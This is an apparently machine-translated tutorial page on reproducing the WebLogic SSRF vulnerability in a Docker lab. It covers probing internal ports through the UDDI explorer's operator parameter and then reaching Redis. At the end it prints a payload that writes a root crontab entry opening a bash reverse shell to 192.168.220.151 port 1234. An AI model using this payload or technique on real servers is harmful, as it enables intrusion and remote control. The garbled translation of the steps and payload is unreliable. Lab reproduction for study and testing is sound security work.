Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to reproduce Weblogic SSRF vulnerabilities

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

Today, I would like to talk to you about how to achieve Weblogic SSRF loophole reproduction, many people may not know much about it. In order to make you understand better, the editor summarized the following content for you. I hope you can get something according to this article.

Use docker to build the environment

Docker installation and Building Environment tutorial: https://www.freebuf.com/sectool/252257.html

Access port 7001

Step 1: vulnerability reappearance step 1: vulnerability existence page / uddiexplorer/SearchPublicRegistries.jsp

2. Check the place IBM.

It is found that it is a connection, so there may be a ssrf.

3. Use burp suite to grab the package, and click Search

4. Modify the connection of operator parameters

5. Access result

Access a port that does not exist and return could not connect over HTTP

Access the existing port return status code

Access the private network

Using redis to bounce shell's payloadset 1 "\ n\ n * root bash-I > & / dev/tcp/192.168.220.151/1234 0 > & 1\ n\ n" config set dir / etc/config set dbfilename crontabsave read the above, do you have any further understanding of how to implement the Weblogic SSRF vulnerability? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report